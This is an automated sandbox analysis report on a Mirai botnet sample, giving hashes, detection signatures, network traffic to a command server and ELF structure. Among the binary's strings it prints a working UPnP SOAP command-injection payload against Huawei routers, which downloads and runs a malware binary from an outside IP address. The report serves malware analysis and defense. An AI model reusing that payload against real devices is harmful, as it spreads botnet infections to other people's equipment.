
Linux Analysis Report
resgod.x86.elf

Overview

General Information

Sample name:resgod.x86.elf
Analysis ID:1643864
MD5:f8bb50cbdd59e1d73e742e209bfe03b0
SHA1:b7ad38f69adf0870088325be578510aff1259818
SHA256:04b4b1fc7e8565c584616bba1c919f37be28c0d0a2aa6f95922c30e2a313a1b3
Tags:elf, user-abuse_ch

Detection

Mirai
Score:72
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1643864
Start date and time:2025-03-20 08:16:45 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 53s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:resgod.x86.elf
Detection:MAL
Classification:mal72.troj.linELF@0/0@12/0
Command:/tmp/resgod.x86.elf
PID:5419
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Yara matches (source: resgod.x86.elf):
• Rule: JoeSecurity_Mirai_6; Description: Yara detected Mirai; Author: Joe Security
• Rule: JoeSecurity_Mirai_8; Description: Yara detected Mirai; Author: Joe Security
• Rule: Linux_Trojan_Gafgyt_9e9530a7; Description: unknown; Author: unknown; Strings: 0x81a0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
• Rule: Linux_Trojan_Gafgyt_807911a2; Description: unknown; Author: unknown; Strings: 0x8853:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
• Rule: Linux_Trojan_Gafgyt_d4227dbf; Description: unknown; Author: unknown; Strings: 0x5ece:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00; 0xa3b8:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
Yara matches (source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp):
• Rule: JoeSecurity_Mirai_6; Description: Yara detected Mirai; Author: Joe Security
• Rule: JoeSecurity_Mirai_8; Description: Yara detected Mirai; Author: Joe Security
• Rule: Linux_Trojan_Gafgyt_9e9530a7; Description: unknown; Author: unknown; Strings: 0x81a0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
• Rule: Linux_Trojan_Gafgyt_807911a2; Description: unknown; Author: unknown; Strings: 0x8853:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
• Rule: Linux_Trojan_Gafgyt_d4227dbf; Description: unknown; Author: unknown; Strings: 0x5ece:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00; 0xa3b8:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          No Suricata rule has matched


          AV Detection

Source: resgod.x86.elf; Virustotal: Detection: 50%
Source: resgod.x86.elf; ReversingLabs: Detection: 52%

Networking

Source: global traffic; TCP traffic: 192.168.2.13:59364 -> 104.168.101.27:8944
Source: unknown; TCP traffic detected without corresponding DNS query: 104.168.101.27 (signature raised 14 times)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (signature raised 7 times)
Source: global traffic; DNS traffic detected: DNS query: daisy.ubuntu.com
Source: resgod.x86.elf; String found in binary or memory: http://104.168.101.27/resgod.mips;
Source: resgod.x86.elf; String found in binary or memory: http://104.168.101.27/sh
Source: resgod.x86.elf; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: resgod.x86.elf; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
Source: resgod.x86.elf; String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: resgod.x86.elf; String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//

          System Summary

Source: resgod.x86.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: resgod.x86.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: resgod.x86.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: resgod.x86.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: resgod.x86.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: resgod.x86.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_0cd591cd; Author: unknown
Source: resgod.x86.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: resgod.x86.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_a33a8363; Author: unknown
Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_0cd591cd; Author: unknown
Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_a33a8363; Author: unknown
Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_0cd591cd; Author: unknown
Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_a33a8363; Author: unknown
Source: Initial sample; String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.168.101.27 -l /tmp/.kx -r /resgod.mips; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: ELF static info symbol of initial sample; .symtab present: no
Rule metadata for the eight Elastic Gafgyt rules above (each rule matched all three sources: resgod.x86.elf, type: SAMPLE; 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY; 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY):
Matched rule: Linux_Trojan_Gafgyt_9e9530a7; reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Matched rule: Linux_Trojan_Gafgyt_807911a2; os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Matched rule: Linux_Trojan_Gafgyt_d4227dbf; reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Matched rule: Linux_Trojan_Gafgyt_d996d335; reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Matched rule: Linux_Trojan_Gafgyt_620087b9; reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Matched rule: Linux_Trojan_Gafgyt_0cd591cd; os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Matched rule: Linux_Trojan_Gafgyt_33b4111a; reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Matched rule: Linux_Trojan_Gafgyt_a33a8363; os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: classification engine; Classification label: mal72.troj.linELF@0/0@12/0

          Stealing of Sensitive Information

Source: Yara match; File source: resgod.x86.elf, type: SAMPLE
Source: Yara match; File source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY
Source: Yara match; File source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: resgod.x86.elf PID: 5419, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: resgod.x86.elf PID: 5420, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match; File source: resgod.x86.elf, type: SAMPLE
Source: Yara match; File source: 5420.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY
Source: Yara match; File source: 5419.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: resgod.x86.elf PID: 5419, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: resgod.x86.elf PID: 5420, type: MEMORYSTR
MITRE ATT&CK matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact)
Techniques observed, all under Command and Control: Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (1); every other cell of the matrix is an unmatched template entry
          No configs have been found
Behavior Graph ID: 1643864; Sample: resgod.x86.elf; Start date: 20/03/2025; Architecture: LINUX; Score: 72
Network nodes: 104.168.101.27, port 8944 (AS-COLOCROSSINGUS, United States); daisy.ubuntu.com
Signatures on the graph: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Mirai
Process chain: resgod.x86.elf started -> resgod.x86.elf started -> resgod.x86.elf started
Source: resgod.x86.elf; Detection: 51%; Scanner: Virustotal
Source: resgod.x86.elf; Detection: 53%; Scanner: ReversingLabs; Label: Linux.Backdoor.Mirai
          No Antivirus matches


Name: daisy.ubuntu.com; IP: 162.213.35.24; Active: true; Malicious: false; Reputation: high
URLs found in the sample (Source: resgod.x86.elf; Malicious: false; Reputation: high for each):
• http://schemas.xmlsoap.org/soap/encoding//%22%3E
• http://schemas.xmlsoap.org/soap/encoding/
• http://schemas.xmlsoap.org/soap/envelope//
• http://104.168.101.27/sh
• http://104.168.101.27/resgod.mips;
• http://schemas.xmlsoap.org/soap/envelope/
IP: 104.168.101.27; Domain: unknown; Country: United States; ASN: 36352; ASN Name: AS-COLOCROSSINGUS; Malicious: false
Match: 104.168.101.27; associated samples (each detected as malicious, threat name Mirai):
• resgod.arm5.elf
• resgod.sh4.elf
• resgod.arm7.elf
• resgod.mpsl.elf
• resgod.sh4.elf
• resgod.arm5.elf
• resgod.mpsl.elf
• resgod.ppc.elf
• resgod.arm7.elf
• resgod.x86.elf
Match: daisy.ubuntu.com; associated samples (detection, threat name; context IP):
• sshd.elf (malicious, Unknown; 162.213.35.24)
• resgod.arm5.elf (malicious, Mirai; 162.213.35.25)
• resgod.arm6.elf (malicious, Mirai; 162.213.35.24)
• resgod.arc.elf (malicious, Mirai; 162.213.35.25)
• resgod.arm7.elf (malicious, Mirai; 162.213.35.24)
• resgod.mpsl.elf (malicious, Mirai; 162.213.35.24)
• resgod.ppc.elf (malicious, Mirai; 162.213.35.24)
• resgod.arc.elf (malicious, Mirai; 162.213.35.24)
• resgod.arm6.elf (malicious, Mirai; 162.213.35.24)
• resgod.mpsl.elf (malicious, Mirai; 162.213.35.24)
Match: AS-COLOCROSSINGUS; associated samples (each detected as malicious, threat name Unknown; context IP):
• Inquiry 20.03.2025.xls (104.168.7.32)
• Payment_Advice.xls (172.245.123.28)
• BGL-17-2025, Packing List ... . 2073799 07 [S-29-40].xls (192.3.101.146)
• Mawaris-RFQ.xls (198.12.89.24)
• NEW ORDER.xls (198.23.212.233)
• PO 23-179, PO 23-181.xls (192.3.101.146)
• BGL-17-2025, Packing List ... . 2073799 07 [S-29-40].xls (192.3.101.146)
• Payment_Advice.xls (172.245.123.28)
• Inquiry 20.03.2025.xls (104.168.7.32)
• Mawaris-RFQ.xls (198.12.89.24)
                                            No context
                                            No created / dropped files found
                                            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                            Entropy (8bit):6.391385033751749
                                            TrID:
                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                            File name:resgod.x86.elf
                                            File size:59'184 bytes
                                            MD5:f8bb50cbdd59e1d73e742e209bfe03b0
                                            SHA1:b7ad38f69adf0870088325be578510aff1259818
                                            SHA256:04b4b1fc7e8565c584616bba1c919f37be28c0d0a2aa6f95922c30e2a313a1b3
                                            SHA512:97c009bb81adc07f2c6456317cdfc9899b32188d05a9ebffb2c16341503a8c588b6909dccd843036705be9f9e11a151e3c76c0be9b50609ed0e69e9cc319df7e
                                            SSDEEP:1536:+KdxVc90i6VSCo0yhtF37iDD7mpr/Ejo8h09:+2VK0i0o0WF3qD7mpLEjo8+9
                                            TLSH:2F434B03654140FCC5C9C6F86A8FAA26E8B7F4B81373F05963C0BD2E7E5DE142B9A645
                                            File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................P.......P.....p.......(...............Q.td....................................................H...._........H........

                                            ELF header

                                            Class:ELF64
                                            Data:2's complement, little endian
                                            Version:1 (current)
                                            Machine:Advanced Micro Devices X86-64
                                            Version Number:0x1
                                            Type:EXEC (Executable file)
                                            OS/ABI:UNIX - System V
                                            ABI Version:0
                                            Entry Point Address:0x400194
                                            Flags:0x0
                                            ELF Header Size:64
                                            Program Header Offset:64
                                            Program Header Size:56
                                            Number of Program Headers:3
                                            Section Header Offset:58544
                                            Section Header Size:64
                                            Number of Section Headers:10
                                            Header String Table Index:9
                                             Name      | Type     | Address  | Offset | Size   | EntSize | Flags | Flags Description | Link | Info | Align
                                                       | NULL     | 0x0      | 0x0    | 0x0    | 0x0     | 0x0   |                   | 0    | 0    | 0
                                             .init     | PROGBITS | 0x4000e8 | 0xe8   | 0x13   | 0x0     | 0x6   | AX                | 0    | 0    | 1
                                             .text     | PROGBITS | 0x400100 | 0x100  | 0xb806 | 0x0     | 0x6   | AX                | 0    | 0    | 16
                                             .fini     | PROGBITS | 0x40b906 | 0xb906 | 0xe    | 0x0     | 0x6   | AX                | 0    | 0    | 1
                                             .rodata   | PROGBITS | 0x40b920 | 0xb920 | 0x22f0 | 0x0     | 0x2   | A                 | 0    | 0    | 32
                                             .ctors    | PROGBITS | 0x50e000 | 0xe000 | 0x10   | 0x0     | 0x3   | WA                | 0    | 0    | 8
                                             .dtors    | PROGBITS | 0x50e010 | 0xe010 | 0x10   | 0x0     | 0x3   | WA                | 0    | 0    | 8
                                             .data     | PROGBITS | 0x50e040 | 0xe040 | 0x430  | 0x0     | 0x3   | WA                | 0    | 0    | 32
                                             .bss      | NOBITS   | 0x50e480 | 0xe470 | 0x29a8 | 0x0     | 0x3   | WA                | 0    | 0    | 32
                                             .shstrtab | STRTAB   | 0x0      | 0xe470 | 0x3e   | 0x0     | 0x0   |                   | 0    | 0    | 1
                                             Type      | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align    | Prog Interpreter | Section Mappings
                                             LOAD      | 0x0    | 0x400000        | 0x400000         | 0xdc10    | 0xdc10      | 6.5470  | 0x5   | R E               | 0x100000 |                  | .init .text .fini .rodata
                                             LOAD      | 0xe000 | 0x50e000        | 0x50e000         | 0x470     | 0x2e28      | 2.0835  | 0x6   | RW                | 0x100000 |                  | .ctors .dtors .data .bss
                                             GNU_STACK | 0x0    | 0x0             | 0x0              | 0x0       | 0x0         | 0.0000  | 0x6   | RW                | 0x8      |                  |


                                            • Total Packets: 26
                                            • 8944 undefined
                                            • 53 (DNS)
                                             Timestamp                           | Source Port | Dest Port | Source IP    | Dest IP
                                             Mar 20, 2025 08:17:32.827790022 CET | 59364       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:17:33.830986023 CET | 59364       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:17:35.846930027 CET | 59364       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:17:40.071042061 CET | 59364       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:17:48.262964010 CET | 59364       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:18:04.390989065 CET | 59364       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:18:37.670968056 CET | 59364       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:19:43.208806038 CET | 59366       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:19:44.230828047 CET | 59366       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:19:46.246747017 CET | 59366       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:19:50.374773979 CET | 59366       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:19:58.566768885 CET | 59366       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:20:14.694808960 CET | 59366       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Mar 20, 2025 08:20:48.742657900 CET | 59366       | 8944      | 192.168.2.13 | 104.168.101.27
                                             Timestamp                           | Source Port | Dest Port | Source IP    | Dest IP
                                             Mar 20, 2025 08:20:17.098084927 CET | 57353       | 53        | 192.168.2.13 | 1.1.1.1
                                             Mar 20, 2025 08:20:17.098084927 CET | 52993       | 53        | 192.168.2.13 | 1.1.1.1
                                             Mar 20, 2025 08:20:22.102946997 CET | 45369       | 53        | 192.168.2.13 | 8.8.8.8
                                             Mar 20, 2025 08:20:22.102957010 CET | 57353       | 53        | 192.168.2.13 | 1.1.1.1
                                             Mar 20, 2025 08:20:27.344005108 CET | 45369       | 53        | 192.168.2.13 | 8.8.8.8
                                             Mar 20, 2025 08:20:27.344014883 CET | 57353       | 53        | 192.168.2.13 | 1.1.1.1
                                             Mar 20, 2025 08:20:32.594172955 CET | 45369       | 53        | 192.168.2.13 | 8.8.8.8
                                             Mar 20, 2025 08:20:32.594181061 CET | 57353       | 53        | 192.168.2.13 | 1.1.1.1
                                             Mar 20, 2025 08:20:37.843904972 CET | 45369       | 53        | 192.168.2.13 | 8.8.8.8
                                             Mar 20, 2025 08:20:37.844084978 CET | 57353       | 53        | 192.168.2.13 | 1.1.1.1
                                             Mar 20, 2025 08:20:43.093919039 CET | 45369       | 53        | 192.168.2.13 | 8.8.8.8
                                             Mar 20, 2025 08:20:43.094046116 CET | 57353       | 53        | 192.168.2.13 | 1.1.1.1
                                             Mar 20, 2025 08:20:43.183912992 CET | 53          | 45369     | 8.8.8.8      | 192.168.2.13
                                             Mar 20, 2025 08:20:43.193397045 CET | 53          | 57353     | 1.1.1.1      | 192.168.2.13
                                             Timestamp                           | Source IP    | Dest IP | Trans ID | OP Code            | Name             | Type           | Class       | DNS over HTTPS
                                             Mar 20, 2025 08:20:17.098084927 CET | 192.168.2.13 | 1.1.1.1 | 0x772a   | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
                                             Mar 20, 2025 08:20:17.098084927 CET | 192.168.2.13 | 1.1.1.1 | 0xf269   | Standard query (0) | daisy.ubuntu.com | 28             | IN (0x0001) | false
                                             Mar 20, 2025 08:20:22.102946997 CET | 192.168.2.13 | 8.8.8.8 | 0xf269   | Standard query (0) | daisy.ubuntu.com | 28             | IN (0x0001) | false
                                             Mar 20, 2025 08:20:22.102957010 CET | 192.168.2.13 | 1.1.1.1 | 0x772a   | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
                                             Mar 20, 2025 08:20:27.344005108 CET | 192.168.2.13 | 8.8.8.8 | 0xf269   | Standard query (0) | daisy.ubuntu.com | 28             | IN (0x0001) | false
                                             Mar 20, 2025 08:20:27.344014883 CET | 192.168.2.13 | 1.1.1.1 | 0x772a   | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
                                             Mar 20, 2025 08:20:32.594172955 CET | 192.168.2.13 | 8.8.8.8 | 0xf269   | Standard query (0) | daisy.ubuntu.com | 28             | IN (0x0001) | false
                                             Mar 20, 2025 08:20:32.594181061 CET | 192.168.2.13 | 1.1.1.1 | 0x772a   | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
                                             Mar 20, 2025 08:20:37.843904972 CET | 192.168.2.13 | 8.8.8.8 | 0xf269   | Standard query (0) | daisy.ubuntu.com | 28             | IN (0x0001) | false
                                             Mar 20, 2025 08:20:37.844084978 CET | 192.168.2.13 | 1.1.1.1 | 0x772a   | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
                                             Mar 20, 2025 08:20:43.093919039 CET | 192.168.2.13 | 8.8.8.8 | 0xf269   | Standard query (0) | daisy.ubuntu.com | 28             | IN (0x0001) | false
                                             Mar 20, 2025 08:20:43.094046116 CET | 192.168.2.13 | 1.1.1.1 | 0x772a   | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
                                             Timestamp                           | Source IP | Dest IP      | Trans ID | Reply Code   | Name             | CName | Address       | Type           | Class       | DNS over HTTPS
                                             Mar 20, 2025 08:20:43.193397045 CET | 1.1.1.1   | 192.168.2.13 | 0x772a   | No error (0) | daisy.ubuntu.com |       | 162.213.35.24 | A (IP address) | IN (0x0001) | false
                                             Mar 20, 2025 08:20:43.193397045 CET | 1.1.1.1   | 192.168.2.13 | 0x772a   | No error (0) | daisy.ubuntu.com |       | 162.213.35.25 | A (IP address) | IN (0x0001) | false

                                            System Behavior

                                            Start time (UTC):07:17:31
                                            Start date (UTC):20/03/2025
                                            Path:/tmp/resgod.x86.elf
                                            Arguments:/tmp/resgod.x86.elf
                                            File size:59184 bytes
                                            MD5 hash:f8bb50cbdd59e1d73e742e209bfe03b0

                                            Start time (UTC):07:17:31
                                            Start date (UTC):20/03/2025
                                            Path:/tmp/resgod.x86.elf
                                            Arguments:-
                                            File size:59184 bytes
                                            MD5 hash:f8bb50cbdd59e1d73e742e209bfe03b0

                                            Start time (UTC):07:17:31
                                            Start date (UTC):20/03/2025
                                            Path:/tmp/resgod.x86.elf
                                            Arguments:-
                                            File size:59184 bytes
                                            MD5 hash:f8bb50cbdd59e1d73e742e209bfe03b0